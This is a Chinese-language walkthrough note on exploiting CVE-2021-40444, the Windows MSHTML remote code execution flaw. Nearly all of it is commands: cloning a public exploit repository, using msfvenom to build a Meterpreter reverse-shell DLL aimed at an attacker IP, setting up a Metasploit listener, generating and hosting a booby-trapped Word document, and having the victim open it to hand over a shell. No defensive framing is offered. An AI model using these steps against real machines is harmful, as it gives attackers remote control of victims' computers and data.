【笔记】CVE-2021-40444漏洞利用

前言

通过lockedbyte/CVE-2021-40444实现远程代码执行漏洞利用

漏洞利用前提

  • Windows 7
  • Windows 8
  • Windows 8.1
  • Windows 10
  • Windows Server 2008
  • Windows Server 2008R2
  • Windows Server 2012
  • Windows Server 2012R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server 2022

下载依赖

Linux

Debian

1
apt install lcab

下载项目

1
2
git clone https://github.com/lockedbyte/CVE-2021-40444.git
cd CVE-2021-40444

攻击者生成木马并监听端口

msf

dll

<ip>:攻击者IP地址
<port>:攻击者msf监听的端口号

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o x.dll

监听反弹Shell

<port>:攻击者msf监听的端口号

1
2
3
4
5
6
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 0.0.0.0
msf exploit(multi/handler) > set lport <port>
msf exploit(multi/handler) > run

攻击者生成包含恶意代码的文档

x.dll:上一步骤生成的dll木马
<ip>:攻击者IP地址
<port>:攻击者监听文档请求的端口号

1
python3 exploit.py generate x.dll http://<ip>:<port>
  • out目录下生成Word文档document.docx

攻击者监听文档请求

<port>:攻击者监听文档请求的端口号

1
python3 exploit.py host <port>

受害者反弹Shell

  • 受害者打开document.docx文件后会上线
1
start document.docx

完成